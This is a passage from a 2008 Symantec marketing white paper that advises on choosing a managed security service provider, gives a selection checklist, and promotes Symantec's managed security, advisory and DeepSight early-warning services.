the effectiveness of the managed services. Thorough reports will include detailed information
gathered from the managed devices, from the related or recommended responses, from any
changes the MSSP has made to the devices, and from information about the latest threats. Ideally,
the MSSP will provide options for viewing and managing reports, including access via email,
standard desktop programs, and a secure Web portal.
Security operations center capabilities
A MSSP will need to operate multiple security operations centers from which it can globally
monitor and manage security issues across its client base. In today's business environment, these
centers must be run 24x7x365. This is not only to remain abreast of the latest threats, but also
to ensure business continuity. The centers must follow predictable and proven processes and
be staffed with a range of security experts that extend the client's in-house capabilities. Strict
hiring guidelines must ensure that hackers are not entrusted with the sensitive security data of an
enterprise.
Recommended MSSP checklist
Real-time monitoring, analysis, and incident response
Security is core business
Demonstrated long-term financial stability
Global online community providing insight and intelligence
Uses proven managed security services policies, standards, and procedures
Recruited and trained professional security staff
Real-time view through flexible client interface
Defined staff development and career path
Background checks to verify staff trustworthiness
24x7x365 manned global operations
Multiple, redundant SOCs with disaster recovery and global coverage
In-depth technical and security support skills
Dedicated threat and vulnerability research support
Dedicated team per client
Services support multiple vendors' products
Can implement security products
Security and financial risks accepted under contract
Defined metrics and accountability
Incident-handling and response capability
Conclusion
Effective security management requires a comprehensive combination of skilled personnel, best
practice processes, and state-of-the-art technology.
Each organization will come to a different conclusion about whether to manage their security
requirements in-house, partner with a MSSP, or decide on a combination of both.
A thorough cost analysis is important when evaluating a MSSP, but it comprises only part of the
total analysis. Levels of staffing, security expertise, specialized skills that may only exist in-house,
and existing security investments are other important considerations.
Deciding between leveraging in-house security resources and partnering with a MSSP requires
research and budgetary scrutiny. It also requires consideration of both the short- and long-term
expenses and benefits.
Ultimately, you should choose the option that will allow you to maintain a strong security posture
that enables you to pursue your primary mission, whether that is a revenue-generating or service
opportunity.
Symantec Global Services
With nearly 4,000 professionals and an extensive partner network, Symantec Global Services
offers deep technical knowledge and proven expertise to help you manage IT risk, performance,
and cost.
Symantec offers several services that help manage and reduce security risks, giving your
organization the foundation to protect its systems, data, and applications, all while providing the
reliability, flexibility, and performance needed to rapidly respond to changing business needs.
Symantec Managed Security Services
Symantec Managed Security Services provides 24x7 remote monitoring and management of labor-
intensive security operations under strict SLAs. As a result, you can confidently focus existing
resources on strategic projects that drive a competitive advantage for your business.
"Thanks to the way that Symantec Managed Security Services filters threats, we only have to respond personally to one or two attacks a month, compared to up to 60 with our previous security vendor."
Manager of information technology and security
Based on groundbreaking SOC technology from Symantec, Symantec Managed Security Services
are delivered through a unique and highly effective combination of skilled personnel, best-practice
processes, and state-of-the-art technology.
Key offerings include:
Security Monitoring Services
Global Intelligence Services
Security Device (IDP) Management Services
Log Management Services
Vulnerability Assessment Services
Managed Threat Analysis
Symantec Intrusion Detection/Protection Solution with Sourcefire
Our unique combination of insight, research, and expertise allows us to relieve your organization
of the burden of analyzing and correlating critical security intelligence as it provides greater
insight into key business information.
Symantec Residency Services
Symantec Residency Services offers highly trained experts who can augment your existing staff at
any level. Residents work onsite as members of your team for an extended period of time, helping
with strategy, projects, ongoing operations, and knowledge transfer. Symantec residents can
perform services under a statement of work, or they can operate under an arrangement where
Symantec takes on responsibility for key IT operations under a strict SLA.
Symantec Advisory Services
Symantec Advisory Services focuses on helping your organization understand and minimize
the security risks associated with your specific information environments. Advisory Services
consultants start by assessing your existing security posture, including policies, architecture,
infrastructure, and operations. Advisors then work to understand your tolerance for risk based on
business goals and strategies.
Armed with this information, our team then works with you to develop a plan to reduce and
manage security risk, taking into account what vulnerabilities need to be addressed immediately,
what can wait until the next upgrade or patch cycle, and what can be considered an acceptable
risk. The end result is a holistic approach to reducing security risk that is based on your business
priorities.
Symantec gathers data from more than two million decoy email addresses, 120 million desktop antivirus sensors, and 40,000 intrusion-detection and firewall sensors worldwide.
Symantec DeepSight Early Warning Services
Symantec DeepSight Early Warning Services delivers notification of vulnerabilities and Internet
security attacks along with threat analyses and actionable information.
Early warning statistics provide insight into real-time incidents collected from more than 40,000
sensors in 180 countries. With these statistics, you can analyze and compare local event data with
global threat activity, threats in organizations similar to yours in size, and threats in companies in
your geographic proximity.
By comparing internal data to the global landscape, your organization can demonstrate security
benchmarking for regulatory compliance. Through integrated management and early warning, you
can accelerate the decision-making process for protecting critical assets.
Free 30-day trial service
You can experience the first line of defense for proactive enterprise security by taking advantage
of our 30-day free trial of Symantec DeepSight Early Warning Services. Contact your sales
representative for more information.
Symantec Managed Solutions
Symantec Managed Solutions combine onsite Symantec Consulting expertise with standardized
managed services delivered from remote locations. Symantec experts take over repetitive, labor-
intensive IT operations under strict SLAs, so that you can optimize your resource investments
and focus on strategic initiatives with confidence.
To find out more
To find out more about the range of Symantec services available, visit our Web site at
www.symantec.com/business/services.
For specific country offices and contact numbers, please visit our Web site. For product information in the U.S., call toll-free 1 (800) 745 6054.
Symantec Corporation, World Headquarters, 20330 Stevens Creek Boulevard, Cupertino, CA 95014 USA. +1 (408) 517 8000, 1 (800) 721 3934, www.symantec.com
Copyright 2008 Symantec Corporation. All rights reserved. Symantec, the Symantec Logo, DeepSight, and Managed Security Services are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. 04/08 13670834-1
About Symantec
Symantec is a global leader in providing security, storage, and systems management solutions to help businesses and consumers secure and manage their information. Headquartered in Cupertino, Calif., Symantec has operations in more than 40 countries. More information is available at www.symantec.com.